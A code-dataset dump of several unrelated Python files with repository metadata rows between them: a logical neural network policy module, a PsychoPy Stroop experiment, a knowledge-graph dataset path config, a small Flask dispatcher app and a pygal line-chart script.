| 40.27551 | 88 | 0.624272 | 445 | 3,947 | 5.253933 | 0.229213 | 0.071856 | 0.032079 | 0.023097 | 0.124038 | 0.047049 | 0.023952 | 0 | 0 | 0 | 0 | 0.002841 | 0.286547 | 3,947 | 97 | 89 | 40.690722 | 0.827415 | 0 | 0 | 0.1 | 0 | 0 | 0.047124 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7144c085cff446c01b799bb109c5bbe09b0b02 | 3,216 | py | Python | policies.py | IBM/LOA | 9cd402c814f1d9c8b4de52ee18a3cb7ec2c6d07a | [
"MIT"
] | 12 | 2021-12-15T09:03:36.000Z | 2022-03-28T21:37:25.000Z | policies.py | IBM/LOA | 9cd402c814f1d9c8b4de52ee18a3cb7ec2c6d07a | [
"MIT"
] | 3 | 2022-01-04T18:03:01.000Z | 2022-03-31T16:15:25.000Z | policies.py | IBM/LOA | 9cd402c814f1d9c8b4de52ee18a3cb7ec2c6d07a | [
"MIT"
] | 4 | 2022-01-04T17:44:23.000Z | 2022-03-28T21:37:42.000Z | import os
import sys
import torch.nn as nn
if True:
DDLNN_HOME = os.environ['DDLNN_HOME']
meta_rule_home = '{}/src/meta_rule/'.format(DDLNN_HOME)
src_rule_home = '{}/dd_lnn/'.format(DDLNN_HOME)
sys.path.append(meta_rule_home)
sys.path.append(src_rule_home)
from lnn_operators \
import and_lukasiewicz, \
and_lukasiewicz_unconstrained, and_lukasiewicz_lambda
EPS = 1e-10
class SimpleAndLNN(nn.Module):
def __init__(self, arity=4, use_slack=True, alpha=0.95, constrained=True,
use_lambda=True):
super().__init__()
self.alpha = alpha
self.use_slack = use_slack
self.arity = arity
self.constrained = constrained
self.use_lambda = use_lambda
if use_lambda:
assert constrained, \
'Lambda LNN can only be used for constrained version'
if constrained:
if use_lambda:
self.and_node = and_lukasiewicz_lambda(alpha, arity, use_slack)
else:
self.and_node = and_lukasiewicz(alpha, arity, use_slack)
else:
self.and_node = \
and_lukasiewicz_unconstrained(alpha, arity, use_slack)
def forward(self, x):
final_pred, final_slack = self.and_node(x)
return final_pred, final_slack
def extract_weights(self, normed=True, verbose=False):
if self.constrained:
if self.use_lambda:
beta, wts = self.and_node.get_params()
else:
beta, wts, slacks = self.and_node.cdd()
else:
beta, wts = self.and_node.get_params()
if normed:
wts = wts / wts.max()
if verbose:
print('beta : ' + str(beta.item()))
print('argument weights : ' + str(wts.detach()))
return beta, wts
class PolicyLNNTWC_SingleAnd(nn.Module):
    """Policy over TWC verbs: one SimpleAndLNN model per admissible verb.

    Args:
        admissible_verbs: mapping of verb name -> arity (1 or 2).
        use_constraint: build constrained AND nodes.
        num_by_arity: optional mapping arity -> number of model inputs;
            defaults to {1: 6, 2: 12}.
    """

    def __init__(self,
                 admissible_verbs,
                 use_constraint=True,
                 num_by_arity=None):
        super().__init__()
        alpha = 0.95
        use_slack = True
        self.alpha = alpha
        self.use_slack = use_slack
        self.use_constraint = use_constraint
        self.admissible_verbs = admissible_verbs
        # ModuleDict so per-verb parameters are registered with torch.
        self.models = nn.ModuleDict()
        if num_by_arity is None:
            self.total_inputs = {1: 6, 2: 12}
        else:
            self.total_inputs = num_by_arity
        for v, arity in admissible_verbs.items():
            self.init_model_for_verb(v, self.total_inputs[arity])

    def init_model_for_verb(self, v, nb_inputs):
        """Create and register the AND model for verb `v`.

        BUG FIX: `use_slack` previously received `self.alpha` (0.95) instead
        of the boolean `self.use_slack`; it only worked because 0.95 is truthy.
        """
        self.models[v] = \
            SimpleAndLNN(arity=nb_inputs, use_slack=self.use_slack,
                         alpha=self.alpha, constrained=self.use_constraint)

    def compute_constraint_loss(self, lnn_model_name='go', lam=0.0001):
        """Constraint loss of one verb's AND node (0.0 if it has no lambda)."""
        and_node = self.models[lnn_model_name].and_node
        return and_node.compute_constraint_loss(lam=lam) if and_node.lam \
            else 0.0

    def forward_eval(self, x, lnn_model_name='go', split=True):
        """Evaluate one verb's model on `x`; returns a (1, N) activation row.

        EPS is added so activations are never exactly zero.  `split` is kept
        for interface compatibility; it is unused here.
        """
        out, _ = self.models[lnn_model_name](x)
        activations = out.view(1, -1) + EPS
        return activations
| 30.056075 | 79 | 0.600435 | 403 | 3,216 | 4.506203 | 0.26799 | 0.044053 | 0.042401 | 0.029736 | 0.202093 | 0.155286 | 0.155286 | 0.093612 | 0.093612 | 0.051762 | 0 | 0.010733 | 0.304726 | 3,216 | 106 | 80 | 30.339623 | 0.801431 | 0 | 0 | 0.182927 | 0 | 0 | 0.036692 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 1 | 0.085366 | false | 0 | 0.04878 | 0.012195 | 0.207317 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e723b8f4a32d0c8a03c62c48807cc3c480dfc71 | 16,604 | py | Python | PsychoPy/testscript.py | esbenkc/Experimental-Methods-1 | e2fa12df0f98043ea83f61f439525a5e78978340 | [
"MIT"
] | null | null | null | PsychoPy/testscript.py | esbenkc/Experimental-Methods-1 | e2fa12df0f98043ea83f61f439525a5e78978340 | [
"MIT"
] | null | null | null | PsychoPy/testscript.py | esbenkc/Experimental-Methods-1 | e2fa12df0f98043ea83f61f439525a5e78978340 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy3 Experiment Builder (v3.1.3),
on June 24, 2019, at 16:21
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import absolute_import, division
from psychopy import locale_setup, sound, gui, visual, core, data, event, logging, clock
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
from psychopy.hardware import keyboard
# ---------------------------------------------------------------------------
# Session setup: working directory, participant dialog, data files, window.
# ---------------------------------------------------------------------------

# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__))
os.chdir(_thisDir)

# Store info about the experiment session
psychopyVersion = '3.1.3'
expName = 'stroop'  # from the Builder filename that created this script
expInfo = {'session': '01', 'participant': ''}
dlg = gui.DlgFromDict(dictionary=expInfo, sortKeys=False, title=expName)
if not dlg.OK:  # idiom fix: was `dlg.OK == False`
    core.quit()  # user pressed cancel
expInfo['date'] = data.getDateStr()  # add a simple timestamp
expInfo['expName'] = expName
expInfo['psychopyVersion'] = psychopyVersion

# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data' + os.sep + '%s_%s' % (expInfo['participant'], expInfo['date'])

# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
    extraInfo=expInfo, runtimeInfo=None,
    originPath='C:\\Users\\lpzdb\\pavloviaDemos\\stroop\\stroop.py',
    savePickle=True, saveWideText=True,
    dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING)  # this outputs to the screen, not a file

endExpNow = False  # flag for 'escape' or other condition => quit the exp

# Setup the Window
win = visual.Window(
    size=[1920, 1080], fullscr=True, screen=0,
    winType='pyglet', allowGUI=False, allowStencil=False,
    monitor='testMonitor', color='black', colorSpace='rgb',
    blendMode='avg', useFBO=True,
    units='height')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] is not None:  # idiom fix: was `!= None`
    frameDur = 1.0 / round(expInfo['frameRate'])
else:
    frameDur = 1.0 / 60.0  # could not measure, so guess
# create a default keyboard (e.g. to check for escape)
defaultKeyboard = keyboard.Keyboard()
# ---------------------------------------------------------------------------
# Build every visual stimulus and clock once, up front, one set per routine.
# ---------------------------------------------------------------------------

# Routine "instruct": instruction text shown until a key is pressed.
instructClock = core.Clock()
instrText = visual.TextStim(
    win=win, name='instrText',
    text='OK. Ready for the real thing?\n\nRemember, ignore the word itself; press:\nLeft for red LETTERS\nDown for green LETTERS\nRight for blue LETTERS\n(Esc will quit)\n\nPress any key to continue',
    font='Arial', units='height',
    pos=[0, 0], height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR', depth=0.0)

# Routine "trial": the Stroop word; text/colour are set per trial later.
trialClock = core.Clock()
word = visual.TextStim(
    win=win, name='word',
    text='default text',
    font='Arial', units='height',
    pos=[0, 0], height=0.15, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR', depth=0.0)

# Routine "thanks": closing message.
thanksClock = core.Clock()
thanksText = visual.TextStim(
    win=win, name='thanksText',
    text='This is the end of the experiment.\n\nThanks!',
    font='Arial', units='height',
    pos=[0, 0], height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR', depth=0.0)

# Handy timers: overall experiment time, and per-routine countdown.
globalClock = core.Clock()
routineTimer = core.CountdownTimer()
# ------Prepare to start Routine "instruct"-------
# Blocking frame loop: draws the instruction text until any key is pressed.
t = 0
instructClock.reset()  # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
ready = keyboard.Keyboard()
# keep track of which components have finished
instructComponents = [instrText, ready]
for thisComponent in instructComponents:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED

# -------Start Routine "instruct"-------
while continueRoutine:
    # get current time
    t = instructClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *instrText* updates
    if t >= 0 and instrText.status == NOT_STARTED:
        # keep track of start time/frame for later
        instrText.tStart = t  # not accounting for scr refresh
        instrText.frameNStart = frameN  # exact frame index
        win.timeOnFlip(instrText, 'tStartRefresh')  # time at next scr refresh
        instrText.setAutoDraw(True)

    # *ready* updates
    waitOnFlip = False
    if t >= 0 and ready.status == NOT_STARTED:
        # keep track of start time/frame for later
        ready.tStart = t  # not accounting for scr refresh
        ready.frameNStart = frameN  # exact frame index
        win.timeOnFlip(ready, 'tStartRefresh')  # time at next scr refresh
        ready.status = STARTED
        # keyboard checking is just starting
        win.callOnFlip(ready.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if ready.status == STARTED and not waitOnFlip:
        theseKeys = ready.getKeys(keyList=None, waitRelease=False)
        if len(theseKeys):
            theseKeys = theseKeys[0]  # at least one key was pressed

            # check for quit:
            # NOTE: comparing a string to a KeyPress object; PsychoPy's
            # KeyPress equality compares against the key name.
            if "escape" == theseKeys:
                endExpNow = True
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in instructComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()

# -------Ending Routine "instruct"-------
for thisComponent in instructComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('instrText.started', instrText.tStartRefresh)
thisExp.addData('instrText.stopped', instrText.tStopRefresh)
# the Routine "instruct" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
trials = data.TrialHandler(nReps=5, method='random',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('trialTypes.xls'),
    seed=None, name='trials')
thisExp.addLoop(trials)  # add the loop to the experiment
thisTrial = trials.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
# NOTE(review): Builder-generated exec() injects each conditions-file column
# (text, letterColor, corrAns, ...) as a top-level variable used below.
if thisTrial != None:
    for paramName in thisTrial:
        exec('{} = thisTrial[paramName]'.format(paramName))
# Main experiment loop: one iteration per Stroop trial (5 reps x conditions).
for thisTrial in trials:
    currentLoop = trials
    # abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)
    if thisTrial != None:
        for paramName in thisTrial:
            exec('{} = thisTrial[paramName]'.format(paramName))

    # ------Prepare to start Routine "trial"-------
    t = 0
    trialClock.reset()  # clock
    frameN = -1
    continueRoutine = True
    # update component parameters for each repeat
    # `letterColor` and `text` come from the conditions file via exec() above.
    word.setColor(letterColor, colorSpace='rgb')
    word.setText(text)
    resp = keyboard.Keyboard()
    # keep track of which components have finished
    trialComponents = [word, resp]
    for thisComponent in trialComponents:
        thisComponent.tStart = None
        thisComponent.tStop = None
        thisComponent.tStartRefresh = None
        thisComponent.tStopRefresh = None
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED

    # -------Start Routine "trial"-------
    while continueRoutine:
        # get current time
        t = trialClock.getTime()
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame

        # *word* updates — the stimulus appears 0.5 s into the routine
        if t >= 0.5 and word.status == NOT_STARTED:
            # keep track of start time/frame for later
            word.tStart = t  # not accounting for scr refresh
            word.frameNStart = frameN  # exact frame index
            win.timeOnFlip(word, 'tStartRefresh')  # time at next scr refresh
            word.setAutoDraw(True)

        # *resp* updates — keyboard opens together with the word
        waitOnFlip = False
        if t >= 0.5 and resp.status == NOT_STARTED:
            # keep track of start time/frame for later
            resp.tStart = t  # not accounting for scr refresh
            resp.frameNStart = frameN  # exact frame index
            win.timeOnFlip(resp, 'tStartRefresh')  # time at next scr refresh
            resp.status = STARTED
            # keyboard checking is just starting
            waitOnFlip = True
            win.callOnFlip(resp.clock.reset)  # t=0 on next screen flip
            win.callOnFlip(resp.clearEvents, eventType='keyboard')  # clear events on next screen flip
        if resp.status == STARTED and not waitOnFlip:
            theseKeys = resp.getKeys(keyList=['left', 'down', 'right'], waitRelease=False)
            if len(theseKeys):
                theseKeys = theseKeys[0]  # at least one key was pressed

                # check for quit:
                if "escape" == theseKeys:
                    endExpNow = True
                resp.keys = theseKeys.name  # just the last key pressed
                resp.rt = theseKeys.rt
                # was this 'correct'?  `corrAns` comes from the conditions file.
                if (resp.keys == str(corrAns)) or (resp.keys == corrAns):
                    resp.corr = 1
                else:
                    resp.corr = 0
                # a response ends the routine
                continueRoutine = False

        # check for quit (typically the Esc key)
        if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
            core.quit()

        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in trialComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished

        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()

    # -------Ending Routine "trial"-------
    for thisComponent in trialComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    trials.addData('word.started', word.tStartRefresh)
    trials.addData('word.stopped', word.tStopRefresh)
    # check responses
    if resp.keys in ['', [], None]:  # No response was made
        resp.keys = None
        # was no response the correct answer?!
        if str(corrAns).lower() == 'none':
            resp.corr = 1;  # correct non-response
        else:
            resp.corr = 0;  # failed to respond (incorrectly)
    # store data for trials (TrialHandler)
    trials.addData('resp.keys',resp.keys)
    trials.addData('resp.corr', resp.corr)
    if resp.keys != None:  # we had a response
        trials.addData('resp.rt', resp.rt)
    trials.addData('resp.started', resp.tStartRefresh)
    trials.addData('resp.stopped', resp.tStopRefresh)
    # the Routine "trial" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()
    thisExp.nextEntry()
# completed 5 repeats of 'trials'

# get names of stimulus parameters
# (empty conditions lists can appear as [], [None] or None depending on source)
if trials.trialList in ([], [None], None):
    params = []
else:
    params = trials.trialList[0].keys()
# save data for this loop to an Excel workbook, one row per condition with
# n/mean/std plus the raw per-repeat values
trials.saveAsExcel(filename + '.xlsx', sheetName='trials',
    stimOut=params,
    dataOut=['n','all_mean','all_std', 'all_raw'])
# ------Prepare to start Routine "thanks"-------
# Fixed-duration routine: shows the thank-you text for 2 seconds.
t = 0
thanksClock.reset()  # clock
frameN = -1
continueRoutine = True
routineTimer.add(2.000000)
# update component parameters for each repeat
# keep track of which components have finished
thanksComponents = [thanksText]
for thisComponent in thanksComponents:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED

# -------Start Routine "thanks"-------
while continueRoutine and routineTimer.getTime() > 0:
    # get current time
    t = thanksClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *thanksText* updates
    if t >= 0.0 and thanksText.status == NOT_STARTED:
        # keep track of start time/frame for later
        thanksText.tStart = t  # not accounting for scr refresh
        thanksText.frameNStart = frameN  # exact frame index
        win.timeOnFlip(thanksText, 'tStartRefresh')  # time at next scr refresh
        thanksText.setAutoDraw(True)
    frameRemains = 0.0 + 2.0- win.monitorFramePeriod * 0.75  # most of one frame period left
    if thanksText.status == STARTED and t >= frameRemains:
        # keep track of stop time/frame for later
        thanksText.tStop = t  # not accounting for scr refresh
        thanksText.frameNStop = frameN  # exact frame index
        win.timeOnFlip(thanksText, 'tStopRefresh')  # time at next scr refresh
        thanksText.setAutoDraw(False)

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in thanksComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()

# -------Ending Routine "thanks"-------
for thisComponent in thanksComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('thanksText.started', thanksText.tStartRefresh)
thisExp.addData('thanksText.stopped', thanksText.tStopRefresh)

# Flip one final time so any remaining win.callOnFlip()
# and win.timeOnFlip() tasks get executed before quitting
win.flip()

# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort()  # or data files will save again on exit
win.close()
core.quit()
| 41.51 | 201 | 0.668152 | 2,021 | 16,604 | 5.476497 | 0.242454 | 0.0206 | 0.008945 | 0.015179 | 0.500271 | 0.489339 | 0.451662 | 0.369353 | 0.369353 | 0.342971 | 0 | 0.011611 | 0.232293 | 16,604 | 399 | 202 | 41.614035 | 0.856672 | 0.333895 | 0 | 0.441948 | 0 | 0.003745 | 0.091625 | 0.006597 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037453 | 0 | 0.037453 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e745ff62ea6033b9af40da163096d4969eae110 | 3,856 | py | Python | EmbLearning/config.py | zhangjindou/SoLE | 2c20e39603ece315d571f8eb12674c6be8d378a4 | [
"MIT"
] | 2 | 2021-03-14T06:35:12.000Z | 2022-01-03T08:39:30.000Z | EmbLearning/config.py | zhangjindou/SoLE | 2c20e39603ece315d571f8eb12674c6be8d378a4 | [
"MIT"
] | null | null | null | EmbLearning/config.py | zhangjindou/SoLE | 2c20e39603ece315d571f8eb12674c6be8d378a4 | [
"MIT"
] | 1 | 2021-03-14T06:35:13.000Z | 2021-03-14T06:35:13.000Z | # ----------------------- PATH ------------------------
ROOT_PATH = "."
DATA_PATH = "%s/../Datasets" % ROOT_PATH
FB15K_DATA_PATH = "%s/fb15k" % DATA_PATH
DB100K_DATA_PATH = "%s/db100k" % DATA_PATH
FB15K_SPARSE_DATA_PATH = "%s/fb15k-sparse" % DATA_PATH
LOG_PATH = "%s/log_dir" % ROOT_PATH
CHECKPOINT_PATH = "%s/checkpoint" % ROOT_PATH

# ----------------------- DATA ------------------------
DATASET = {}


def _dataset_entry(data_path, groundings_path=None):
    """Build the standard file-path mapping for one dataset directory.

    Every dataset shares the same layout; `groundings_path` overrides the
    default `<data_path>/groundings.txt` for the per-threshold variants.
    """
    return {
        "train_raw": "%s/train.txt" % data_path,
        "valid_raw": "%s/valid.txt" % data_path,
        "test_raw": "%s/test.txt" % data_path,
        "train": "%s/digitized_train.txt" % data_path,
        "valid": "%s/digitized_valid.txt" % data_path,
        "test": "%s/digitized_test.txt" % data_path,
        "e2id": "%s/e2id.txt" % data_path,
        "r2id": "%s/r2id.txt" % data_path,
        "groundings": groundings_path or "%s/groundings.txt" % data_path,
    }


# Individual path constants are kept as module-level names for importers.
FB15K_TRAIN_RAW = "%s/train.txt" % FB15K_DATA_PATH
FB15K_VALID_RAW = "%s/valid.txt" % FB15K_DATA_PATH
FB15K_TEST_RAW = "%s/test.txt" % FB15K_DATA_PATH
FB15K_TRAIN = "%s/digitized_train.txt" % FB15K_DATA_PATH
FB15K_VALID = "%s/digitized_valid.txt" % FB15K_DATA_PATH
FB15K_TEST = "%s/digitized_test.txt" % FB15K_DATA_PATH
FB15K_E2ID = "%s/e2id.txt" % FB15K_DATA_PATH
FB15K_R2ID = "%s/r2id.txt" % FB15K_DATA_PATH
FB15K_GNDS = "%s/groundings.txt" % FB15K_DATA_PATH
FB15K_RULES = "%s/lifted_rules.txt" % FB15K_DATA_PATH
DATASET["fb15k"] = _dataset_entry(FB15K_DATA_PATH)

DB100K_TRAIN_RAW = "%s/train.txt" % DB100K_DATA_PATH
DB100K_VALID_RAW = "%s/valid.txt" % DB100K_DATA_PATH
DB100K_TEST_RAW = "%s/test.txt" % DB100K_DATA_PATH
DB100K_TRAIN = "%s/digitized_train.txt" % DB100K_DATA_PATH
DB100K_VALID = "%s/digitized_valid.txt" % DB100K_DATA_PATH
DB100K_TEST = "%s/digitized_test.txt" % DB100K_DATA_PATH
DB100K_E2ID = "%s/e2id.txt" % DB100K_DATA_PATH
DB100K_R2ID = "%s/r2id.txt" % DB100K_DATA_PATH
DB100K_GNDS = "%s/groundings.txt" % DB100K_DATA_PATH
DATASET["db100k"] = _dataset_entry(DB100K_DATA_PATH)

FB15K_SPARSE_TRAIN_RAW = "%s/train.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_VALID_RAW = "%s/valid.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_TEST_RAW = "%s/test.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_TRAIN = "%s/digitized_train.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_VALID = "%s/digitized_valid.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_TEST = "%s/digitized_test.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_E2ID = "%s/e2id.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_R2ID = "%s/r2id.txt" % FB15K_SPARSE_DATA_PATH
FB15K_SPARSE_GNDS = "%s/groundings.txt" % FB15K_SPARSE_DATA_PATH
DATASET["fb15k-sparse"] = _dataset_entry(FB15K_SPARSE_DATA_PATH)

# Per-threshold grounding variants: confidence thresholds 50..100 in steps
# of 5, plus the 'oneTime' grounding run.  Same file layout as the base
# datasets except for the groundings file.
groundings = [str(50 + i * 5) for i in range(11)] + ['oneTime']
for item in groundings:
    for _name, _path in (("fb15k", FB15K_DATA_PATH),
                         ("db100k", DB100K_DATA_PATH)):
        DATASET["%s_%s" % (_name, item)] = _dataset_entry(
            _path, "%s/groundings_%s.txt" % (_path, item))

# ----------------------- PARAM -----------------------
RANDOM_SEED = 123
| 34.428571 | 76 | 0.673237 | 534 | 3,856 | 4.430712 | 0.071161 | 0.125106 | 0.098901 | 0.088335 | 0.72612 | 0.581572 | 0.480981 | 0.346577 | 0.3153 | 0.243449 | 0 | 0.093683 | 0.158454 | 3,856 | 111 | 77 | 34.738739 | 0.635439 | 0.041753 | 0 | 0.357895 | 0 | 0 | 0.238147 | 0.052831 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e79f3580f36653daa75d2b29b580bf63af34199 | 932 | py | Python | Krypton/WebApp/__init__.py | BolunHan/Krypton | 8caf8e8efad6172ea0783c777e7df49a2ac512cb | [
"MIT"
] | null | null | null | Krypton/WebApp/__init__.py | BolunHan/Krypton | 8caf8e8efad6172ea0783c777e7df49a2ac512cb | [
"MIT"
] | null | null | null | Krypton/WebApp/__init__.py | BolunHan/Krypton | 8caf8e8efad6172ea0783c777e7df49a2ac512cb | [
"MIT"
] | null | null | null | from flask import Flask
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple
from Base import Telemetric, CONFIG
__all__ = ['start_app']
__version__ = "0.1.0"
LOGGER = Telemetric.LOGGER.getChild('WebApp')
APP = Flask(__name__)
HOSTNAME = CONFIG.get('WebApp', 'HOST', fallback='0.0.0.0')
PORT = CONFIG.getint('WebApp', 'PORT', fallback=80)
import WebApp.Monitor
import WebApp.FileServer
mounts = {
'/Monitor': WebApp.Monitor.FLASK_APP,
'/FileServer': WebApp.FileServer.FLASK_APP,
}
def start_app():
    """Serve APP plus the mounted sub-apps with werkzeug's dev server.

    Blocks until the server stops.
    NOTE(review): source indentation was lost in extraction; the placement
    of the ``__name__`` guard (logging only when run as a script) is the
    reconstruction that keeps every statement reachable — confirm against
    the original repository.
    """
    application = DispatcherMiddleware(APP, mounts)
    if __name__ == '__main__':
        for mount_path in mounts:
            LOGGER.info(f'WebApp running on http://{HOSTNAME}:{PORT}/{mount_path}')
    run_simple(
        hostname=HOSTNAME,
        port=PORT,
        application=application
    )


if __name__ == '__main__':
    start_app()
| 23.3 | 83 | 0.683476 | 109 | 932 | 5.504587 | 0.422018 | 0.04 | 0.01 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012 | 0.195279 | 932 | 39 | 84 | 23.897436 | 0.788 | 0 | 0 | 0.071429 | 0 | 0 | 0.146996 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.214286 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e7b1a04d745dc6e204362c61a41930cc35f005b | 682 | py | Python | class3/testsvg.py | dnsbob/pynet_testz | 8a4c778e8592efd796dc27417b7ae7ee4d9111cc | [
"Apache-2.0"
] | null | null | null | class3/testsvg.py | dnsbob/pynet_testz | 8a4c778e8592efd796dc27417b7ae7ee4d9111cc | [
"Apache-2.0"
] | null | null | null | class3/testsvg.py | dnsbob/pynet_testz | 8a4c778e8592efd796dc27417b7ae7ee4d9111cc | [
"Apache-2.0"
] | null | null | null | ''' testsvg.py '''
import pygal
# Five-minute samples of FastEthernet4 traffic; output lags input by one slot.
fa4_in_packets = [24, 21, 40, 32, 21, 21, 49, 9, 21, 34, 24, 21]
fa4_out_packets = [21, 24, 21, 40, 32, 21, 21, 49, 9, 21, 34, 24]

# Build a line chart and give it a title.
line_chart = pygal.Line()
line_chart.title = 'Input/Output Packets and Bytes'

# X axis: minute marks for the five-minute sampling interval.
line_chart.x_labels = [str(minute) for minute in range(5, 65, 5)]

# One series per direction.
line_chart.add('InPackets', fa4_in_packets)
line_chart.add('OutPackets', fa4_out_packets)

# Render the chart to an SVG file.
line_chart.render_to_file('test.svg')
